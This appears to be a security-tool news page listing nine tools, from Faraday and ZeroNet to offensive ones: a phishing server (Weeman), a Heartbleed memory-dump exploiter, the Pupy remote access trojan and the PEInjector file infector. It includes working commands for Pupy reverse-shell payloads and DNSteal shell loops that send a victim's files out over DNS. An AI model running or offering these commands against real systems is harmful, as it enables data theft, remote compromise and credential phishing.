Faraday 1.0.15 - Collaborative Penetration Test and Vulnerability Management Platform

A brand new version is ready for you to enjoy! Faraday v1.0.15 (Community, Pro & Corp) was published today with new exciting features.

As a part of our constant commitment to the IT sec community we added a tool that runs several other tools to all IPs in a given list. This results in a major scan to your infrastructure which can be done as frequently as necessary. Interested? Read more about it here.

This version also features three new plugins and a fix developed entirely by our community! Congratulations to Andres and Ezequiel for being the first two winners of the Faraday Challenge! Are you interested in winning tickets for Ekoparty as well? Submit your pull request or find us on freenode #faraday-dev and let us know.

Changes:

* Continuous Scanning Tool cscan added to ./scripts/cscan

* Hosts and Services views now have pagination and search

* Updates version number on Faraday Start
* Added Services columns to Status Report

* Converted references to links in Status Report. Support for CVE, CWE, Exploit Database and Open Source Vulnerability Database

* Added Pippingtom, SSHdefaultscan and pasteAnalyzer plugins

Fixes: 

* Debian install

* Saving objects without parent

* Visual fixes on Firefox

Download Faraday 1.0.15

Read More

ZeroNet - Decentralized websites using Bitcoin crypto and BitTorrent network

Decentralized websites using Bitcoin crypto and the BitTorrent network - http://zeronet.io

Why?

• We believe in open, free, and uncensored network and communication.
• No single point of failure: Site remains online so long as at least 1 peer serving it.
• No hosting costs: Sites are served by visitors.
• Impossible to shut down: It's nowhere because it's everywhere.
• Fast and works offline: You can access the site even if your internet is unavailable.

Features

• Real-time updated sites
• Namecoin .bit domains support
• Easy to setup: unpack & run
• Clone websites in one click
• Password-less BIP32based authorization: Your account is protected by same cryptography as your Bitcoin wallet
• Built-in SQL server with P2P data synchronization: Allows easier site development and faster page load times
• Tor network support
• TLS encrypted connections
• Automatic, uPnP port opening
• Plugin for multiuser (openproxy) support
• Works with any browser/OS

How does it work?

• After starting zeronet.py you will be able to visit zeronet sites using http://127.0.0.1:43110/{zeronet_address} (eg. http://127.0.0.1:43110/1EU1tbG9oC1A8jz2ouVwGZyQ5asrNsE4Vr).
• When you visit a new zeronet site, it tries to find peers using the BitTorrent network so it can download the site files (html, css, js...) from them.
• Each visited site becomes also served by you.
• Every site contains a site.json which holds all other files in a sha512 hash and a signature generated using site's private key.
• If the site owner (who has the private key for the site address) modifies the site, then he/she signs the new content.json and publishes it to the peers. After the peers have verified the content.json integrity (using the signature), they download the modified files and publish the new content to other peers.

How to join?

Windows

• Download ZeroBundle package that includes Python 2.7.9 and all required libraries
• Unpack to any directory
• Run zeronet.cmd

It downloads the latest version of ZeroNet then starts it automatically.

Alternative method for Windows by installing Python

• Install Python 2.7
• Install Python Greenlet
• Install Python Gevent
• Install Python MsgPack
• Download and extract ZeroNet to any directory
• Run start.py

Linux

Debian

• sudo apt-get update
• sudo apt-get install msgpack-python python-gevent
• wget https://github.com/HelloZeroNet/ZeroNet/archive/master.tar.gz
• tar xvpfz master.tar.gz
• cd ZeroNet-master
• Start with python zeronet.py
• Open http://127.0.0.1:43110/ in your browser and enjoy! :)

Other Linux or without root access

• Check your python version using python --version if the returned version is not Python 2.7.X then try python2 or python2.7 command and use it from now
• wget https://bootstrap.pypa.io/get-pip.py
• python get-pip.py --user gevent msgpack-python
• Start with python zeronet.py

Mac

• Install Homebrew
• brew install python
• pip install gevent msgpack-python
• Download, Unpack, run python zeronet.py

Vagrant

• vagrant up
• Access VM with vagrant ssh
• cd /vagrant
• Run python zeronet.py --ui_ip 0.0.0.0
• Open http://127.0.0.1:43110/ in your browser

Docker

• docker run -p 15441:15441 -p 43110:43110 nofish/zeronet​
• Open http://127.0.0.1:43110/ in your browser

Download ZeroNet

Read More

Weeman - HTTP Server for Phishing

HTTP server for phishing in python. Weeman has support for most of the (bigest) websites.

Usually you will want run Weeman with DNS spoof attack. (see dsniff, ettercap).

Weeman will do the following steps:

1. Create fake html page.
2. Wait for clients
3. Grab the data (POST).
4. Try to login the client to the original page

Requirements

• Python <= 2.7.
• Python BeautifulSoup 4

Install BeautifulSoup

• Archlinux - sudo pacman -S python2-beautifulsoup4
• Ubuntu/Linuxmint - sudo apt-get install python-bs4
• For another OS: - sudo pip install beautifulsoup4

Platforms

• Linux (any)
• Mac (Not tested)
• Windows (Not tested)

[!] If weeman runs on your platform (Mac/Windows), please let me know.

Usage
Just type help

Run server:

• For port 80 you need to run Weeman as root!
• Host to clone (Ex: www.social-networks.local)
  

  set url http://localhost

• "<"form action = "TAKE THIS URL">"(View the site source and take the URL)
  

  set action_url http://localhost/sendlogin 

• The port Weeman server will listen
  

  set port 2020

• Start the server
  

  run

The settings will be saved for the next time you run weeman.py.

Download Weeman

Read More

Heartbleed Vulnerability Scanner - Network Scanner for OpenSSL Memory Leak (CVE-2014-0160)

Heartbleed Vulnerability Scanner is a multiprotocol (HTTP, IMAP, SMTP, POP) CVE-2014-0160 scanning and automatic exploitation tool written with python.

For scanning wide ranges automatically, you can provide a network range in CIDR notation and an output file to dump the memory of vulnerable system to check after.

Hearbleed Vulnerability Scanner can also get targets from a list file. This is useful if you already have a list of systems using SSL services such as HTTPS, POP3S, SMTPS or IMAPS.

git clone https://github.com/hybridus/heartbleedscanner.git

Sample usage

To scan your local 192.168.1.0/24 network for heartbleed vulnerability (https/443) and save the leaks into a file:

python heartbleedscan.py -n 192.168.1.0/24 -f localscan.txt -r

To scan the same network against SMTP Over SSL/TLS and randomize the IP addresses

python heartbleedscan.py -n 192.168.1.0/24 -p 25 -s SMTP -r

If you already have a target list which you created by using nmap/zmap

python heartbleedscan.py -i targetlist.txt

Dependencies

Before using Heartbleed Vulnerability Scanner, you should install python-netaddr package.

CentOS or CentOS-like systems :

yum install python-netaddr

Ubuntu or Debian-like systems :

apt-get insall python-netaddr

Download Heartbleed Vulnerability Scanner

Read More

Gryffin - Large Scale Web Security Scanning Platform

Gryffin is a large scale web security scanning platform. It is not yet another scanner. It was written to solve two specific problems with existing scanners: coverage and scale.

Better coverage translates to fewer false negatives. Inherent scalability translates to capability of scanning, and supporting a large elastic application infrastructure. Simply put, the ability to scan 1000 applications today to 100,000 applications tomorrow by straightforward horizontal scaling.

Coverage

Coverage has two dimensions - one during crawl and the other during fuzzing. In crawl phase, coverage implies being able to find as much of the application footprint. In scan phase, or while fuzzing, it implies being able to test each part of the application for an applied set of vulnerabilities in a deep.

Crawl Coverage

Today a large number of web applications are template-driven, meaning the same code or path generates millions of URLs. For a security scanner, it just needs one of the millions of URLs generated by the same code or path. Gryffin's crawler does just that.

Page Deduplication

At the heart of Gryffin is a deduplication engine that compares a new page with already seen pages. If the HTML structure of the new page is similar to those already seen, it is classified as a duplicate and not crawled further.

DOM Rendering and Navigation

A large number of applications today are rich applications. They are heavily driven by client-side JavaScript. In order to discover links and code paths in such applications, Gryffin's crawler uses PhantomJS for DOM rendering and navigation.

Scan Coverage

As Gryffin is a scanning platform, not a scanner, it does not have its own fuzzer modules, even for fuzzing common web vulnerabilities like XSS and SQL Injection.

It's not wise to reinvent the wheel where you do not have to. Gryffin at production scale at Yahoo uses open source and custom fuzzers. Some of these custom fuzzers might be open sourced in the future, and might or might not be part of the Gryffin repository.

For demonstration purposes, Gryffin comes integrated with sqlmap and arachni. It does not endorse them or any other scanner in particular.

The philosophy is to improve scan coverage by being able to fuzz for just what you need.

Scale

While Gryffin is available as a standalone package, it's primarily built for scale.

Gryffin is built on the publisher-subscriber model. Each component is either a publisher, or a subscriber, or both. This allows Gryffin to scale horizontally by simply adding more subscriber or publisher nodes.

Operating Gryffin

Pre-requisites

1. Go
2. PhantomJS, v2
3. Sqlmap (for fuzzing SQLi)
4. Arachni (for fuzzing XSS and web vulnerabilities)
5. NSQ ,
   • running lookupd at port 4160,4161
   • running nsqd at port 4150,4151
   • with --max-msg-size=5000000
6. Kibana and Elastic search, for dashboarding
   • listening to JSON over port 5000
   • Preconfigured docker image available in https://hub.docker.com/r/yukinying/elk/

Installation

go get github.com/yahoo/gryffin/...

Run

TODO

1. Mobile browser user agent
2. Preconfigured docker images
3. Redis for sharing states across machines
4. Instruction to run gryffin (distributed or standalone)
5. Documentation for html-distance
6. Implement a JSON serializable cookiejar.
7. Identify duplicate url patterns based on simhash result.

Download Gryffin

Read More

Pupy - Multi-Platform Remote Administration Tool

Pupy is an opensource, multi-platform Remote Administration Tool written in Python. On Windows, Pupy uses reflective dll injection and leaves no traces on disk.

Features :

• On windows, the Pupy payload is compiled as a reflective DLL and the whole python interpreter is loaded from memory. Pupy does not touch the disk :)
• Pupy can reflectively migrate into other processes
• Pupy can remotely import, from memory, pure python packages (.py, .pyc) and compiled python C extensions (.pyd). The imported python modules do not touch the disk. (.pyd mem import currently work on Windows only, .so memory import is not implemented).
• modules are quite simple to write and pupy is easily extensible.
• Pupy uses rpyc and a module can directly access python objects on the remote client
  • we can also access remote objects interactively from the pupy shell and even auto completion of remote attributes works !
• communication channel currently works as a ssl reverse connection, but a bind payload will be implemented in the future
• all the non interactive modules can be dispatched on multiple hosts in one command
• Multi-platform (tested on windows 7, windows xp, kali linux, ubuntu)
• modules can be executed as background jobs
• commands and scripts running on remote hosts are interruptible
• auto-completion and nice colored output :-)
• commands aliases can be defined in the config

Implemented Modules :

• migrate (windows only)
  • inter process architecture injection also works (x86->x64 and x64->x86)
• keylogger (windows only)
• persistence (windows only)
• screenshot (windows only)
• webcam snapshot (windows only)
• command execution
• download
• upload
• socks5 proxy
• local port forwarding
• interactive shell (cmd.exe, /bin/sh, ...)
• interactive python shell
• shellcode exec (thanks to @byt3bl33d3r)

Quick start

In these examples the server is running on a linux host (tested on kali linux) and it's IP address is 192.168.0.1
The clients have been tested on (Windows 7, Windows XP, kali linux, ubuntu, Mac OS X 10.10.5)

generate/run a payload
for Windows

./genpayload.py 192.168.0.1 -p 443 -t exe_x86 -o pupyx86.exe

you can also use -t dll_x86 or dll_x64 to generate a reflective DLL and inject/load it by your own means.

for Linux

pip install rpyc #(or manually copy it if you are not admin)
python reverse_ssl.py 192.168.0.1:443

for MAC OS X

easy_install rpyc #(or manually copy it if you are not admin)
python reverse_ssl.py 192.168.0.1:443

start the server

1. eventually edit pupy.conf to change the bind address / port
2. start the pupy server :

./pupysh.py

Some screenshots

list connected clients

help

execute python code on all clients

execute a command on all clients, exception is retrieved in case the command does not exists

use a filter to send a module only on selected clients

migrate into another process

interactive shell

interactive python shell

example: How to write a MsgBox module

first of all write the function/class you want to import on the remote client
in the example we create the file pupy/packages/windows/all/pupwinutils/msgbox.py

import ctypes
import threading

def MessageBox(text, title):
    t=threading.Thread(target=ctypes.windll.user32.MessageBoxA, args=(None, text, title, 0))
    t.daemon=True
    t.start()

then, simply create a module to load our package and call the function remotely

class MsgBoxPopup(PupyModule):
    """ Pop up a custom message box """

    def init_argparse(self):
        self.arg_parser = PupyArgumentParser(prog="msgbox", description=self.__doc__)
        self.arg_parser.add_argument('--title', help='msgbox title')
        self.arg_parser.add_argument('text', help='text to print in the msgbox :)')

    @windows_only
    def is_compatible(self):
        pass

    def run(self, args):
        self.client.load_package("pupwinutils.msgbox")
        self.client.conn.modules['pupwinutils.msgbox'].MessageBox(args.text, args.title)
        self.log("message box popped !")

Dependencies

rpyc (https://github.com/tomerfiliba/rpyc)

Roadmap and ideas

Some ideas without any priority order

• support for https proxy
• bind instead of reverse connection
• add offline options to payloads like enable/disable certificate checking, embed offline modules (persistence, keylogger, ...), etc...
• integrate scapy in the windows dll :D (that would be fun)
• work on stealthiness and modules under unix systems
• webcam snap
• mic recording
• socks5 udp support
• remote port forwarding
• perhaps write some documentation
• ...
• any cool idea ?

Download Pupy

Read More

DNSteal - DNS Exfiltration tool for stealthily sending files over DNS requests

This is a fake DNS server that allows you to stealthily extract files from a victim machine through DNS requests.

Below is an image showing an example of how to use:

On the victim machine, you simply can do something like so:

for b in $(xxd -p file/to/send.png); do dig @server $b.filename.com; done

Support for multiple files

for filename in $(ls); do for b in $(xxd -p $f); do dig +short @server %b.$filename.com; done; done

gzip compression supported
It also supports compression of the file to allow for faster transfer speeds, this can be achieved using the "-z" switch:

python dnsteal.py 127.0.0.1 -z

Then on the victim machine send a Gzipped file like so:

for b in $(gzip -c file/to/send.png | xxd -p); do dig @server $b.filename.com; done

or for multiple, gzip compressed files:

for filename in $(ls); do for b in $(gzip -c $filename | xxd -p); do dig +short @server %b.$filename.com; done; done

Download DNSteal

Read More

Tiger - The Unix security audit and intrusion detection tool

Tiger is a security tool that can be use both as a security audit and intrusion detection system. It supports multiple UNIX platforms and it is free and provided under a GPL license. Unlike other tools, Tiger needs only of POSIX tools and is written entirely in shell language.

Tiger has some interesting features that merit its resurrection, including a modular design that is easy to expand, and its double edge, it can be used as an audit tool and a host intrusion detection system tool. Free Software intrusion detection is currently going many ways, from network IDS (with Snort), to the kernel (LIDS, or SNAREfor Linux and Systrace for OpenBSD, for example), not mentioning file integrity checkers (many of these: aide, integrit samhain, tripwire...) and logcheckers (even more of these, check the Log Analysis pages). But few of them focus on the host-side of intrusion detection fully. Tiger complements this tools and also provides a framework in which all of them can work together. Tiger it is not a logchecker, nor it focused in integrity analysis. It does "the other stuff", it checks the system configuration and status. Read the manpagefor a full description of checks implemented in Tiger. A good example of what Tiger can do is, for example, check_findeleted, a module that can determine which network servers running in a system are using deleted files (because libraries were patched during an upgrade but the server's services not restarted).

Installation

sudo apt-get install tiger

Download Tiger

Read More

PEInjector - MITM PE file infector

The executable file format on the Windows platform is PE COFF. The peinjector provides different ways to infect these files with custom payloads without changing the original functionality. It creates patches, which are then applied seamlessly during file transfer. It is very performant, lightweight, modular and can be operated on embedded hardware.

Features

• Full x86 and x64 PE file support.
• Open Source
• Fully working on Windows and Linux, including automated installation scripts.
• Can be operated on embedded hardware, tested on a Rasperberry Pi 2.
• On Linux, all servers will be automatically integrated as service, no manual configuration required.
• Plain C, no external libraries required (peinjector).
• MITM integration is available in C, Python and Java. A sample Python MITM implementation is included.
• Foolproof, mobile-ready web interface. Anyone who can configure a home router can configure the injector server.
• Easy to use integrated shellcode factory, including reverse shells, meterpreter, ... or own shellcode. Everything is available in 32 and 64 bit with optional automated encryption. Custom shellcode can be injected directly or as a new thread.
• An awesome about page and much more, check it out.

Download PEInjector

Read More